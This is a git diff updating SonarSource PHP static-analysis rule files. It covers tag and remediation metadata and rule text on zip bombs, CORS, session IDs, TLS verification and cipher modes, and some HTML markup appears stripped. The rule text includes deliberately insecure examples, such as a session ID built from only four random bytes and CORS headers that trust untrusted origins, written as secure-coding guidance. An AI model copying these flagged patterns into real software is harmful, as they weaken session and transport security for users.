diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json index 8c7a0ff071..5d30d450ca 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json @@ -2,9 +2,7 @@ "title": "Controlling permissions is security-sensitive", "type": "SECURITY_HOTSPOT", "status": "deprecated", - "tags": [ - - ], + "tags": [], "defaultSeverity": "Minor", "ruleSpecification": "RSPEC-4834", "sqKey": "S4834", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html index bb40071cdb..b183b76498 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html @@ -1,7 +1,7 @@Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will -compress irrelevant data (eg: a long string of repeated bytes).
+compress irrelevant data (eg: a long string of repeated bytes).Archives to expand are untrusted and:
For ZipArchive module:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html index e1d015a85f..5a156a337f 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html @@ -10,7 +10,7 @@ / relax the same origin policy.Access-Control-Allow-Origin: untrustedwebsite.com. Access-Control-Allow-Origin: untrustedwebsite.com. Access-Control-Allow-Origin: * origin header. If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length ...) an attacker may be able to -hijack another user's session.
+If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length …) an attacker may be able to +hijack another user’s session.
There is a risk if you answered yes to any of those questions.
Don't manually generate session IDs, use instead language based native functionality.
+Don’t manually generate session IDs, use instead language based native functionality.
session_id(bin2hex(random_bytes(4))); // Sensitive: 4 bytes is too short @@ -26,6 +26,7 @@See
Misconfiguration
@@ -57,6 +60,9 @@Compliant Solution
$mailer = new PHPMailer(true); $mailer->SMTPSecure = 'tls'; // Compliant + +define( 'FORCE_SSL_ADMIN', true); // Compliant +define( 'FORCE_SSL_LOGIN', true); // Compliant
No issue is reported for the following cases because they are not considered sensitive:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json index 52063608be..ec4db6e889 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json @@ -18,12 +18,6 @@ ], "OWASP": [ "A3" - ], - "OWASP Mobile": [ - "M3" - ], - "MASVS": [ - "MSTG-NETWORK-1" ] } } diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html index 216cc1a320..d09efa2ac2 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html @@ -1,7 +1,7 @@ -To establish a SSL/TLS connection not vulnerable to man-in-the-middle attacks, it's essential to make sure the server presents the right -certificate.
-The certificate's hostname-specific data should match the server hostname.
-It's not recommended to re-invent the wheel by implementing custom hostname verification.
+To establish a SSL/TLS connection not vulnerable to man-in-the-middle attacks, it’s essential to make sure the server presents the right +certificate.
+The certificate’s hostname-specific data should match the server hostname.
+It’s not recommended to re-invent the wheel by implementing custom hostname verification.
TLS/SSL libraries provide built-in hostname verification functions that should be used.
@@ -19,6 +19,10 @@See
Encryption operation mode and the padding scheme should be chosen appropriately to guarantee data confidentiality, integrity and authenticity:
the GCM (Galois Counter Mode) mode which works -internally with zero/no padding scheme, is recommended, as it is designed to provide both data authenticity (integrity) and confidentiality. Other -similar modes are CCM, CWC, EAX, IAPM and OCB.
-the CBC (Cipher Block Chaining) mode by itself provides only data confidentiality, it's recommended to use it along with Message -Authentication Code or similar to achieve data authenticity (integrity) too and thus to prevent padding oracle attacks.
-the ECB (Electronic Codebook) mode doesn't provide serious message confidentiality: under a given key any given plaintext block -always gets encrypted to the same ciphertext block. This mode should not be used.
-Strong cipher algorithms are cryptographic systems resistant to cryptanalysis, they are not vulnerable to well-known attacks like brute force attacks for example.
A general recommendation is to only use cipher algorithms intensively tested and promoted by the cryptographic community.
-More specifically for block cipher, it's not recommended to use algorithm with a block size inferior than 128 bits.
+More specifically for block cipher, it’s not recommended to use algorithm with a block size inferior than 128 bits.
<?php
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
index 41eb84cc51..08c96bd53b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
@@ -2,12 +2,17 @@
"title": "Cipher algorithms should be robust",
"type": "VULNERABILITY",
"status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "15min"
+ },
"tags": [
"cwe",
"privacy",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5547",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
index 321041374e..919612e113 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-5632",
"sqKey": "S5632",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
index 38ad90660f..f267f89e78 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
@@ -13,7 +13,7 @@ Recommended Secure Coding Practices
It is recommended to customize the rule with the limit values that correspond to the web application.
Testing equality or nullness with PHPUnit's assertTrue() or assertFalse() should be simplified to the corresponding
+
Testing equality or nullness with PHPUnit’s assertTrue() or assertFalse() should be simplified to the corresponding
dedicated assertion.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
index be406ffb6c..ebaa53c4d9 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
@@ -2,6 +2,10 @@
"title": "PHPUnit assertTrue\/assertFalse should be simplified to the corresponding dedicated assertion",
"type": "CODE_SMELL",
"status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "2min"
+ },
"tags": [
"tests",
"phpunit"
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
index 96f51ca3c2..5ccd9444e2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
@@ -1,5 +1,5 @@
Authorizations granted or not to users to access resources of an application should be based on strong decisions. For instance, checking whether
-the user is authenticated or not, has the right roles/privileges. It may also depend on the user's location, or the date, time when the user requests
+the user is authenticated or not, has the right roles/privileges. It may also depend on the user’s location, or the date, time when the user requests
access.
Noncompliant Code Example
In a Symfony web application:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
index 802e42228e..3bec1a2be4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
@@ -1,4 +1,4 @@
-Assertions comparing an object to itself are more likely to be bugs due to developer's carelessness.
+Assertions comparing an object to itself are more likely to be bugs due to developer’s carelessness.
This rule raises an issue when the actual expression matches the expected expression.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
index 94a7033973..7b7582219b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
@@ -1,4 +1,4 @@
-Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it's a
+
Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it’s a
good practice to generate a new session each time a user authenticates and delete/invalidate the existing session (the one possibly known by the
attacker).
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
index 1151980ad1..56ba5cb564 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
@@ -1,8 +1,8 @@
The PHPUnit test runner does execute public methods defined within test classes that have a name starting with "test" or the
-@test annotation. Methods that do not convey to this will not get executed.
+@test annotation. Methods that do not convey to this will not get executed.
This rule raises an issue on methods marked as test methods (by name or annotation) but do not have a public visibility. An issue is also raised on
public methods that are not marked as tests, do contain assertions, and are not called from within another discoverable test method within the class.
-No issues are raised in abstract classes.
+No issues are raised in abstract classes.
Noncompliant Code Example
class MyTest extends \PHPUnit\Framework\TestCase {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
index 631b8ac253..9cecc4de2e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-881",
"sqKey": "S881",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
index e9d441d31b..3865061ef1 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
@@ -7,8 +7,7 @@
"constantCost": "10min"
},
"tags": [
- "cwe",
- "based-on-misra"
+ "cwe"
],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-930",
@@ -17,6 +16,10 @@
"securityStandards": {
"CWE": [
628
+ ],
+ "CERT": [
+ "EXP37-C.",
+ "DCL07-C."
]
}
}
diff --git a/sonarpedia.json b/sonarpedia.json
index f596c4d8d9..26b4802ab4 100644
--- a/sonarpedia.json
+++ b/sonarpedia.json
@@ -3,7 +3,7 @@
"languages": [
"PHP"
],
- "latest-update": "2021-04-23T08:30:00.832237Z",
+ "latest-update": "2021-08-16T12:31:35.301669Z",
"options": {
"no-language-in-filenames": true,
"preserve-filenames": true